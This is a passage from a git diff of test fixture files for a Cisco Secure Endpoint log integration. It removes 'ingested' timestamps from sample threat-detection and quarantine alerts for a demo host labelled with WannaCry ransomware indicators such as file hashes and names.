Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -6938,7 +6853,6 @@ ], "code": "2164260880", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212795270Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -7014,7 +6928,6 @@ ], "code": "2164260880", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212796097Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 @@ -7090,7 +7003,6 @@ ], "code": "2164260880", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212796916Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":33000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 @@ -7164,7 +7076,6 @@ ], "code": "1090519054", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212797767Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 @@ -7254,7 +7165,6 @@ ], "code": "1090519054", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212798740Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 @@ -7344,7 +7254,6 @@ ], "code": "1090519054", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212799554Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 @@ -7434,7 +7343,6 @@ ], "code": "1090519054", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212800372Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 @@ -7524,7 +7432,6 @@ ], "code": "1090519054", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212801185Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":876000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 @@ -7614,7 +7521,6 @@ ], "code": "1090519054", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212802021Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":845000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 @@ -7704,7 +7610,6 @@ ], "code": "1090519054", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212802831Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":798000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 @@ -7794,7 +7699,6 @@ ], "code": "1090519054", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212803652Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":767000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 @@ -7884,7 +7788,6 @@ ], "code": "1090519054", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212804456Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 @@ -7974,7 +7877,6 @@ ], "code": "1090519054", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212805282Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":735000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 @@ -8068,7 +7970,6 @@ ], "code": "1090519054", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212806090Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "severity": 2 @@ -8161,7 +8062,6 @@ ], "code": "1090519054", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212806893Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json index 6fc2b418ae4..968ba341732 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json @@ -48,7 +48,6 @@ ], "code": "1090519054", "id": "6419275394960065000", - "ingested": "2022-02-02T05:53:05.376854691Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":96000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat 